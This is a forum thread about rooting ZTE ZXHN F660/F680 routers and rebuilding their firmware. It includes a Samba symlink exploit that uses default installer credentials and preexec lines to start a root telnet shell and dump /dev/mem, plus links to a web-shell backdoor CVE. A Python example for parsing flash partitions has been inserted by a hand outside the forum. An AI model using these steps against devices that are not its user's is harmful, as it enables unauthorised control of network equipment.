ZTE ZXHN F660 - Power to the masses
-
- Posts: 4
- Registered on: 02 May 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
Hello,
We have another problem: I have got an F660v5 running firmware "t38" and the passwords are encrypted! When you print information with sendcmd (over TTL) the passwords show as asterisks.
I rolled back to the first FW and I got the passwords without problem, but it is different in the latest firmware.
I guess the new F670 has got the encryption too.
Do you know something about this?
- error_404
- Global moderator
- Posts: 360
- Registered on: 22 Dec 2012 10:58
Re: ZTE ZXHN F660 - Power to the masses
Hi,
First of all, I only have an F660 and for this reason I cannot give feedback for the F670.
If in the new firmware the password is encrypted, you can change it as root and create another user with Telnet access!
Of course with the root which you mention you've gained:
Code: Select all
sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
-
- Posts: 4
- Registered on: 02 May 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
error_404 wrote: ↑22 Aug 2018 20:09
> Hi,
> first of all I only have F660 and for this reason I cannot give feedback for F670.
> If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!
> of course with root which you mention you've gained
> Code: Select all
> sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
Yes, I know. I changed the password, but I want an easy way to access as admin without opening the ONT... In consequence, to know the original password.
Do you know where the hash is stored?
Thanks!
-
- Posts: 4
- Registered on: 02 May 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
Today I found a new firmware on the F660 v5.2... V5.2.10P3T52
I can't enter over TTL because now root/root doesn't work anymore. Telnet is closed on the LAN too...
I think we haven't got more options now, what do you think?
My idea now is to dump the NAND, it is an F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.
- error_404
- Global moderator
- Posts: 360
- Registered on: 22 Dec 2012 10:58
For historic archive: WebShell Command Exploit
Just putting some exploit which was not working anymore, but for historic reasons and knowledge!
https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/
web_shell_cmd.gch
Routersploit Module
f460_f660_backdoor.py
- error_404
- Global moderator
- Posts: 360
- Registered on: 22 Dec 2012 10:58
-
- Posts: 1
- Registered on: 21 Jun 2020 18:56
Re: ZTE ZXHN F660 - Power to the masses
Hello to everybody... it's a nice article and helps a lot. I am trying to create my firmware by dumping from my mtdblocks.
My ZTE is a ZXHN H267A h.v 1.1
# cat /proc/mtd
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"
I saved my mtdblock0 (whole flash) to my computer with the help of a tftp server.
I tried to binwalk the mtdblock0 and I really found the start of the magic header 99 99 99 99 44 44 44 44.
I compared the chunks in memory and I found the part that contains the kernel and rootfs... I created my upgrade.bin with these two (in mtdblock0 they are concatenated already).
I don't have the original firmware, but I compared with another firmware for the H267A from another country (different ISP provider).
The size of my created firmware is a little smaller than the original I found...
Please help... did I miss something?
I binwalked the original firmware but unsquashfs_all doesn't support the file system... so I can't decompress... I do all the work in a hex viewer and by SSH to my router...
Thanks in advance!
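The /proc/mtd table and magic-header search from the post above, worked through as an added Python example; this is not code from the forum, from ZTE or from the poster. It parses the listing, assigns each partition a byte offset under the assumption that the sub-partitions sit back to back inside mtd0 in the listed order (/proc/mtd only reports sizes, so confirm the offsets against the bootloader's partition table or a binwalk run before carving anything), checks that every partition is erase-block aligned and fits inside the whole flash, and then scans a constructed dump for the 99 99 99 99 44 44 44 44 header to report which partition it falls in and how many bytes a raw kernel1+rootfs1 concatenation occupies. The name ZTE_MAGIC and the placement of the header at the computed start of kernel1 in the constructed dump are ours, chosen for illustration only.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the /proc/mtd listing quoted in the post, embedded
# inline so the example runs offline.
PROC_MTD = """\
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"
"""

# The 8-byte header the poster found with binwalk (the name is ours, not ZTE's).
ZTE_MAGIC = bytes.fromhex("99 99 99 99 44 44 44 44")

LINE_RE = re.compile(r'^(mtd\d+):\s+([0-9a-fA-F]+)\s+([0-9a-fA-F]+)\s+"([^"]*)"$')


@dataclass
class MtdPartition:
    dev: str
    size: int
    erasesize: int
    name: str
    offset: int  # byte offset inside mtd0 (see the assumption in parse_proc_mtd)


def parse_proc_mtd(text: str) -> List[MtdPartition]:
    """Parse a /proc/mtd listing. Offsets are ASSUMED: /proc/mtd gives sizes
    only, so the sub-partitions are laid out back to back in listing order."""
    parts: List[MtdPartition] = []
    offset = 0
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header line, or a line we do not understand
        dev, size_hex, erase_hex, name = m.groups()
        size, erase = int(size_hex, 16), int(erase_hex, 16)
        if dev == "mtd0":
            # mtd0 spans the whole chip; it is not a sub-partition.
            parts.append(MtdPartition(dev, size, erase, name, 0))
            continue
        parts.append(MtdPartition(dev, size, erase, name, offset))
        offset += size
    return parts


def check_partitions(parts: List[MtdPartition]) -> List[str]:
    """Sanity checks before carving: erase-block alignment, and no
    sub-partition running past the end of the whole flash."""
    whole = next(p for p in parts if p.dev == "mtd0")
    issues = []
    for p in parts:
        if p.size % p.erasesize:
            issues.append(f"{p.dev} ({p.name}): size not a multiple of erasesize")
        if p.dev != "mtd0" and p.offset + p.size > whole.size:
            issues.append(f"{p.dev} ({p.name}): extends past whole flash")
    return issues


def find_magic(dump: bytes, magic: bytes = ZTE_MAGIC) -> List[int]:
    """Return every offset at which the header appears in the dump."""
    offsets, i = [], dump.find(magic)
    while i != -1:
        offsets.append(i)
        i = dump.find(magic, i + 1)
    return offsets


def partition_for_offset(parts: List[MtdPartition], off: int) -> Optional[str]:
    """Name of the sub-partition that contains byte offset `off`, if any."""
    for p in parts:
        if p.dev != "mtd0" and p.offset <= off < p.offset + p.size:
            return p.name
    return None


def image_size_for(parts: List[MtdPartition], names) -> int:
    """Bytes a raw concatenation of the named partitions occupies."""
    return sum(p.size for p in parts if p.name in names)


def build_sample_dump(parts: List[MtdPartition]) -> bytes:
    """Constructed dump for the demo: zero-filled up to one erase block past
    the start of kernel1, with the magic placed at kernel1's computed offset."""
    kernel = next(p for p in parts if p.name == "kernel1")
    dump = bytearray(kernel.offset + kernel.erasesize)
    dump[kernel.offset:kernel.offset + len(ZTE_MAGIC)] = ZTE_MAGIC
    return bytes(dump)


if __name__ == "__main__":
    parts = parse_proc_mtd(PROC_MTD)
    for p in parts:
        print(f"{p.dev:5} {p.name:12} offset=0x{p.offset:08x} size=0x{p.size:08x}")
    print("issues:", check_partitions(parts) or "none")
    dump = build_sample_dump(parts)
    for off in find_magic(dump):
        print(f"magic at 0x{off:08x} -> {partition_for_offset(parts, off)}")
    print("kernel1+rootfs1 bytes:", image_size_for(parts, {"kernel1", "rootfs1"}))
```

To use it on a real dump, read the mtdblock0 image into `find_magic` and compare the partition byte counts with the size of whatever image you are reconstructing; a mismatch between the raw kernel+rootfs total and a vendor image is a measurement to investigate, not something this example explains.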
- error_404
- Global moderator
- Posts: 360
- Registered on: 22 Dec 2012 10:58
ZTE ZXHN F680 - Update for the masses
Hello boys and girls,
a long long time ago I had too much time to play with the F660, but...... now ANTEL are taking the step to change the old F660 with the brand new F680 (better WiFi + extender option and can handle up to 800 Mbits), so the new challenge is about to begin....
I'll try the samba exploiting method first as well, and of course using UART for debugging and to find some new treasures....
As you know the F660 is already covered to the max w/o the firmwares; it would be nice to have some repository of different firmwares as it is a very common product for PON providers worldwide.....
HINT and TIP:
Use USB with a symbolic link to exploit SAMBA and enable it on the F680 with instalador/wwzz2233
Code: Select all
ln -s /var/samba/lib/smb.conf
Look on the internet for how to modify the smb.conf on the fly and how to make reverse telnet....
[will make telnet listen on port 2323]
Code: Select all
preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:2323 -l /mnt/usb2_1_1/sh
Also obtain BusyBox for the current hardware architecture (arm71 or MIPS) and copy it as 2 files with the same content 1:1 - busybox and sh ....(yes, we'll use BusyBox as SHELL)
On the USB drive, apart from the symbolic link, you must have both files, which are the same.
(this is publicly available information and is everywhere, trust me, credits go to the authors)
Something like this:
Code: Select all
preexec = /bin/sh -c '(sendcmd 1 DB set TelnetCfg 0 UserTypeFlag 0 && sendcmd 1 DB save) 2> /mnt/usb1_1/cmd.err > /mnt/usb1_1/cmd.out'
Make a dump of the memory:
Code: Select all
preexec = /bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt
This is very raw raw material and mostly notes, as I'm waiting for the hardware to attach the UART and DEBUG the dEVIL
-
- Posts: 4
- Registered on: 02 May 2018 04:22
Re: ZTE ZXHN F660 - Power to the masses
The samba exploit is patched in the latest version of F680, V6.0.20P3N8.
- error_404
- Global moderator
- Posts: 360
- Registered on: 22 Dec 2012 10:58
Re: ZTE ZXHN F660 - Power to the masses
Sadly I know that, and for this reason and for lack of free time this was abandoned by me, but hey, you can try it harder via JTAG. It's still accessible, and yes, some HP employee (ANTEL staff) is watching this topic and taking countermeasures....
Best wishes to the new 2023